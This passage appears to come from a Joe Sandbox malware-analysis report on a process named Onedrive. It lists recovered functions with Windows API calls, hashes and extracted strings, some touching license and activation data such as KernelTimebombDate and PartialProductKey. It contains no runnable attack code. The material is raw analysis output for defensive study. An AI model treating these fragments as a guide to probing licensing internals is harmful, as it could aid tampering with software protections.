                                                    APIs
                                                      • Part of subcall function 00007FF63EA193FC: GetProcessHeap.KERNEL32(?,?,?,00007FF63EA18E62,?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA19425
                                                      • Part of subcall function 00007FF63EA193FC: HeapFree.KERNEL32(?,?,?,00007FF63EA18E62,?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA19439
                                                      • Part of subcall function 00007FF63EA193FC: GetProcessHeap.KERNEL32(?,?,?,00007FF63EA18E62,?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA19460
                                                      • Part of subcall function 00007FF63EA193FC: HeapFree.KERNEL32(?,?,?,00007FF63EA18E62,?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA19474
                                                    • GetProcessHeap.KERNEL32(?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA18E6B
                                                    • HeapFree.KERNEL32(?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA18E80
                                                    • GetProcessHeap.KERNEL32(?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA18EA1
                                                    • HeapFree.KERNEL32(?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA18EB6
                                                    • GetProcessHeap.KERNEL32(?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA18ED7
                                                    • HeapFree.KERNEL32(?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA18EEC
                                                    • GetProcessHeap.KERNEL32(?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA18F0D
                                                    • HeapFree.KERNEL32(?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA18F22
                                                    • GetProcessHeap.KERNEL32(?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA18F43
                                                    • HeapFree.KERNEL32(?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA18F58
                                                    • GetProcessHeap.KERNEL32(?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA18F79
                                                    • HeapFree.KERNEL32(?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA18F8E
                                                    • GetProcessHeap.KERNEL32(?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA18FAF
                                                    • HeapFree.KERNEL32(?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA18FC4
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: cae523c6d732ae3a046b12cbb7a892b6bb2d1f35e030631837f27fb96ec666e9
                                                    • Instruction ID: 676fdc8cb819839ad0d99d3906633270899561c3c4195fc1e97a5ef16ce072b1
                                                    • Opcode Fuzzy Hash: cae523c6d732ae3a046b12cbb7a892b6bb2d1f35e030631837f27fb96ec666e9
                                                    • Instruction Fuzzy Hash: 6C41C922A04A4297EB04AB62D5483BDABE0FF7DB49F898575D70E96355CF3CE0189360
                                                    Function 00007FF63EA1C7F4 Relevance: 16.6, APIs: 3, Strings: 8, Instructions: 137memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • memset.MSVCRT ref: 00007FF63EA1C821
                                                      • Part of subcall function 00007FF63EA1DD74: GetProcessHeap.KERNEL32(?,?,00000000,00007FF63EA1C831), ref: 00007FF63EA1DEB2
                                                      • Part of subcall function 00007FF63EA1DD74: HeapFree.KERNEL32(?,?,00000000,00007FF63EA1C831), ref: 00007FF63EA1DEC6
                                                      • Part of subcall function 00007FF63EA1D98C: GetProcessHeap.KERNEL32(?,?,?,00000000,?,?,?,00007FF63EA1C83D), ref: 00007FF63EA1DA5B
                                                      • Part of subcall function 00007FF63EA1D98C: HeapFree.KERNEL32(?,?,?,00000000,?,?,?,00007FF63EA1C83D), ref: 00007FF63EA1DA6F
                                                      • Part of subcall function 00007FF63EA1D98C: GetProcessHeap.KERNEL32(?,?,?,00000000), ref: 00007FF63EA1DA90
                                                      • Part of subcall function 00007FF63EA1D98C: HeapFree.KERNEL32(?,?,?,00000000), ref: 00007FF63EA1DAA4
                                                    • GetProcessHeap.KERNEL32 ref: 00007FF63EA1C9B9
                                                    • HeapFree.KERNEL32 ref: 00007FF63EA1C9CD
                                                      • Part of subcall function 00007FF63EA1CD40: _wcsicmp.MSVCRT ref: 00007FF63EA1CDA1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess$_wcsicmpmemset
                                                    • String ID: GraceEndDate$KernelTimebombDate$LastConsumptionReason$LastValidationError$LicenseExpirationDate$PartialProductKey$ProductKeyType$SkuId
                                                    • API String ID: 1329376875-3221521310
                                                    • Opcode ID: 886d2079de2440a1dc17ccb1289c6ba122f9246d015c5aedb6db7103f639f3d0
                                                    • Instruction ID: 0dd98442fcb35598de89274a727c7e404b0fe4b1173a53a76fc6706edc435f51
                                                    • Opcode Fuzzy Hash: 886d2079de2440a1dc17ccb1289c6ba122f9246d015c5aedb6db7103f639f3d0
                                                    • Instruction Fuzzy Hash: D5512E61B08B1355FB049BE5C8921FC27A1AF65788F804431EA0DD7B96EF79E50DD360
                                                    Function 00007FF63EA17B1C Relevance: 15.3, APIs: 10, Instructions: 284memorycomCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CoCreateInstance.API-MS-WIN-CORE-COM-L1-1-0(?,?,?,?,00000000,00000002,?,00000000,?,00007FF63EA11653), ref: 00007FF63EA17B76
                                                    • GetProcessHeap.KERNEL32(?,?,?,?,00000000,00000002,?,00000000,?,00007FF63EA11653), ref: 00007FF63EA17C3A
                                                    • HeapAlloc.KERNEL32(?,?,?,?,00000000,00000002,?,00000000,?,00007FF63EA11653), ref: 00007FF63EA17C54
                                                    • memset.MSVCRT ref: 00007FF63EA17C7A
                                                    • GetProcessHeap.KERNEL32(?,?,?,?,00000000,00000002,?,00000000,?,00007FF63EA11653), ref: 00007FF63EA17CE9
                                                    • HeapAlloc.KERNEL32(?,?,?,?,00000000,00000002,?,00000000,?,00007FF63EA11653), ref: 00007FF63EA17CFE
                                                    • GetProcessHeap.KERNEL32(?,?,?,?,00000000,00000002,?,00000000,?,00007FF63EA11653), ref: 00007FF63EA17D76
                                                    • HeapAlloc.KERNEL32(?,?,?,?,00000000,00000002,?,00000000,?,00007FF63EA11653), ref: 00007FF63EA17D8B
                                                    • GetProcessHeap.KERNEL32(?,?,?,?,00000000,00000002,?,00000000,?,00007FF63EA11653), ref: 00007FF63EA17E03
                                                    • HeapAlloc.KERNEL32(?,?,?,?,00000000,00000002,?,00000000,?,00007FF63EA11653), ref: 00007FF63EA17E18
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$AllocProcess$CreateInstancememset
                                                    • String ID:
                                                    • API String ID: 2970048943-0
                                                    • Opcode ID: 2d6941d3c3f96ca2edc9991dc4b88ee1e50cea78047afc8d96a8f69007c24f62
                                                    • Instruction ID: 48664def56808e8175afc753380db8d5e2e8c79f988d285a0b8d7d23c6919eeb
                                                    • Opcode Fuzzy Hash: 2d6941d3c3f96ca2edc9991dc4b88ee1e50cea78047afc8d96a8f69007c24f62
                                                    • Instruction Fuzzy Hash: 6AC16F32B18B8282EB04DB66D8401B937E4FB79B847519635EE4D93751EF3CE598D310
                                                    Function 00007FF63EA16454 Relevance: 15.1, APIs: 12, Instructions: 106memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA164C0
                                                    • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA164D5
                                                    • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA164F2
                                                    • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA16507
                                                    • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA16524
                                                    • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA16539
                                                    • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA16556
                                                    • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA1656B
                                                    • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA16588
                                                    • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA1659D
                                                    • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA165CD
                                                    • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA165E1
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: 15737396d7e36de835ef5cf2251aab48bcf9544a645884e82e969f2fc5883780
                                                    • Instruction ID: 76b90fc7a0894eae2ff9a0a5c79b5f49a933c9ad613c81e5c93ecacb64324d21
                                                    • Opcode Fuzzy Hash: 15737396d7e36de835ef5cf2251aab48bcf9544a645884e82e969f2fc5883780
                                                    • Instruction Fuzzy Hash: 13416432A04B85C6EB049F61A1441B9BBA0FFBDB85B498175EA4E97319DF3CD049D710
                                                    Function 00007FF63EA18CE0 Relevance: 15.1, APIs: 12, Instructions: 88memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00007FF63EA193FC: GetProcessHeap.KERNEL32(?,?,?,00007FF63EA18E62,?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA19425
                                                      • Part of subcall function 00007FF63EA193FC: HeapFree.KERNEL32(?,?,?,00007FF63EA18E62,?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA19439
                                                      • Part of subcall function 00007FF63EA193FC: GetProcessHeap.KERNEL32(?,?,?,00007FF63EA18E62,?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA19460
                                                      • Part of subcall function 00007FF63EA193FC: HeapFree.KERNEL32(?,?,?,00007FF63EA18E62,?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA19474
                                                    • GetProcessHeap.KERNEL32(?,?,00000000,00007FF63EA18CAD), ref: 00007FF63EA18CFF
                                                    • HeapFree.KERNEL32(?,?,00000000,00007FF63EA18CAD), ref: 00007FF63EA18D14
                                                    • GetProcessHeap.KERNEL32(?,?,00000000,00007FF63EA18CAD), ref: 00007FF63EA18D35
                                                    • HeapFree.KERNEL32(?,?,00000000,00007FF63EA18CAD), ref: 00007FF63EA18D4A
                                                    • GetProcessHeap.KERNEL32(?,?,00000000,00007FF63EA18CAD), ref: 00007FF63EA18D6B
                                                    • HeapFree.KERNEL32(?,?,00000000,00007FF63EA18CAD), ref: 00007FF63EA18D80
                                                    • GetProcessHeap.KERNEL32(?,?,00000000,00007FF63EA18CAD), ref: 00007FF63EA18DA1
                                                    • HeapFree.KERNEL32(?,?,00000000,00007FF63EA18CAD), ref: 00007FF63EA18DB6
                                                    • GetProcessHeap.KERNEL32(?,?,00000000,00007FF63EA18CAD), ref: 00007FF63EA18DD7
                                                    • HeapFree.KERNEL32(?,?,00000000,00007FF63EA18CAD), ref: 00007FF63EA18DEC
                                                    • GetProcessHeap.KERNEL32(?,?,00000000,00007FF63EA18CAD), ref: 00007FF63EA18E0D
                                                    • HeapFree.KERNEL32(?,?,00000000,00007FF63EA18CAD), ref: 00007FF63EA18E22
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: bf1518c68518747d8e75550e0073bb1ebe2d32fc955a20064eca9f5bcd791406
                                                    • Instruction ID: ab37782657529cd7cc365bbdec97a582977f486bf90e1c3de67679ee3e6b8aea
                                                    • Opcode Fuzzy Hash: bf1518c68518747d8e75550e0073bb1ebe2d32fc955a20064eca9f5bcd791406
                                                    • Instruction Fuzzy Hash: 5641FE22A04A42D7EB049B6291483BDABE0FF7DB49F498575D70E87745DF3CD0189360
                                                    Function 00007FFDF3AEA8F0 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 264COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: PointerValidswprintf
                                                    • String ID: #File Error#(%d) : $%hs(%d) : $Dumping objects ->$client block at 0x%p, subtype %x, %Iu bytes long.$crt block at 0x%p, subtype %x, %Iu bytes long.$normal block at 0x%p, %Iu bytes long.${%ld}
                                                    • API String ID: 2867872725-2254558347
                                                    • Opcode ID: e0d5ac88001468575471fabc83286a0951fb7053397fe8767a2cadde61e4fbc8
                                                    • Instruction ID: a7ea70d1ab41d4f9b930e80c9655c23b008019acb90feff70685a33ec3c546dc
                                                    • Opcode Fuzzy Hash: e0d5ac88001468575471fabc83286a0951fb7053397fe8767a2cadde61e4fbc8
                                                    • Instruction Fuzzy Hash: D0C13D36718B8586E760DB17E4A1B6A73A0FB85750F114131EA9D9BBADDF3DD4408B00
                                                    Function 00007FF63EA19CD8 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 258memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00007FF63EA1A33C: SLOpen.SLC(?,?,?,?,?,?,?,00000000), ref: 00007FF63EA1A37E
                                                      • Part of subcall function 00007FF63EA1A33C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00007FF63EA1A5F9
                                                      • Part of subcall function 00007FF63EA1A33C: HeapFree.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00007FF63EA1A60D
                                                      • Part of subcall function 00007FF63EA1A33C: LocalFree.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00007FF63EA1A622
                                                      • Part of subcall function 00007FF63EA1A33C: LocalFree.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00007FF63EA1A63C
                                                      • Part of subcall function 00007FF63EA1A33C: LocalFree.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00007FF63EA1A656
                                                      • Part of subcall function 00007FF63EA1A33C: SLClose.SLC(?,?,?,?,?,?,?,00000000), ref: 00007FF63EA1A670
                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF63EA1704B), ref: 00007FF63EA1A00D
                                                    • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF63EA1704B), ref: 00007FF63EA1A022
                                                    • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF63EA1704B), ref: 00007FF63EA1A036
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Free$HeapLocal$Process$CloseOpen
                                                    • String ID: Kernel-ExpirationDate
                                                    • API String ID: 3289953759-555650421
                                                    • Opcode ID: ec37c195baf8c0247c0ae37d5ff26c1606d082038a14728f8d7ed840f1ddf7a0
                                                    • Instruction ID: 131cd68b3ce758d8af6f3dd657b4ae4bfcc114d1c68ac96aeac0c57527d19790
                                                    • Opcode Fuzzy Hash: ec37c195baf8c0247c0ae37d5ff26c1606d082038a14728f8d7ed840f1ddf7a0
                                                    • Instruction Fuzzy Hash: 79B19032A0CB528AE7218FA1D4006BD67A5FF69784F159139EE4F97780DF38E489E710
                                                    Function 00007FFDF3AEC980 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 145COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • __vcrt_lock.LIBVCRUNTIMED ref: 00007FFDF3AECA2E
                                                      • Part of subcall function 00007FFDF3AF6620: EnterCriticalSection.KERNEL32(?,?,?,?,00007FFDF3AE8375,?,?,?,?,00007FFDF3AE8062), ref: 00007FFDF3AF6641
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: CriticalEnterSection__vcrt_lock
                                                    • String ID: %ls$Bad memory block found at 0x%p.$Bad memory block found at 0x%p.Memory allocated at %hs(%d).$_CrtMemCheckpoint$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp$state != nullptr
                                                    • API String ID: 1786109592-3601319530
                                                    • Opcode ID: 722345fc339e5307dad66cf511f6cbea81baa1efcc648aa63954b5faa99f4bf1
                                                    • Instruction ID: 8becb431c39b286ceaf9970e494290890c255ce25beb3d643c578b5ead28f0bb
                                                    • Opcode Fuzzy Hash: 722345fc339e5307dad66cf511f6cbea81baa1efcc648aa63954b5faa99f4bf1
                                                    • Instruction Fuzzy Hash: F3715136B18B4186DB24CB1AE4A1B3AB7A0F784754F210535EA9D57B98CF7DD445CB00
                                                    Function 00007FF63EA1C214 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 145memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$Free$Process$InformationLocalWindowsmemset
                                                    • String ID: Security-SPP-Action-StateData
                                                    • API String ID: 2630303489-3551652513
                                                    • Opcode ID: 7699336b6b7f282b642f77ab4554ed0c2efedfc1209a31443493f7247048ebea
                                                    • Instruction ID: 1edba009b896a467d6ef476498c85701444df1a6ba2099d82cfcd52116904b25
                                                    • Opcode Fuzzy Hash: 7699336b6b7f282b642f77ab4554ed0c2efedfc1209a31443493f7247048ebea
                                                    • Instruction Fuzzy Hash: B951BE32B08A5286EB15EBA194023BDA7A0FFB9788F444131FA4DD7785DF3CE5099760
                                                    Function 00007FF63EA1ACA4 Relevance: 12.7, APIs: 10, Instructions: 197memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$Free$Alloc_vsnwprintf
                                                    • String ID:
                                                    • API String ID: 869350258-0
                                                    • Opcode ID: a95e66a2d486a7de2bc33df1643f9172f06d30cbe7a2b837ad745425032e1045
                                                    • Instruction ID: d0c296705264c2487fcd55b9dba5791ed0a7bd14b943ec049c20cee7e8992934
                                                    • Opcode Fuzzy Hash: a95e66a2d486a7de2bc33df1643f9172f06d30cbe7a2b837ad745425032e1045
                                                    • Instruction Fuzzy Hash: B571B832F0CA6387EA256BE2644427D6691AFB9B85F454134FD0ED73C5EE3CE80D6260
                                                    Function 00007FFDF3AEA310 Relevance: 11.5, Strings: 9, Instructions: 289COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed., xrefs: 00007FFDF3AEA705
                                                    • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 00007FFDF3AEA426
                                                    • DAMAGED, xrefs: 00007FFDF3AEA365
                                                    • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d)., xrefs: 00007FFDF3AEA6CE
                                                    • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 00007FFDF3AEA578
                                                    • %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d)., xrefs: 00007FFDF3AEA7D2
                                                    • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer., xrefs: 00007FFDF3AEA48E
                                                    • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer., xrefs: 00007FFDF3AEA5E0
                                                    • %hs located at 0x%p is %Iu bytes long., xrefs: 00007FFDF3AEA844
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %hs located at 0x%p is %Iu bytes long.$%hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d).$DAMAGED$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d).
                                                    • API String ID: 0-1381456093
                                                    • Opcode ID: 407bbe65323f13c1446eca2a6ba213da027fc83528b946b518c18121b60aee1a
                                                    • Instruction ID: 8b8b0109d92528cbead8706f406dcf2648fcd0fb6d3284b6954da02f4ffaf7be
                                                    • Opcode Fuzzy Hash: 407bbe65323f13c1446eca2a6ba213da027fc83528b946b518c18121b60aee1a
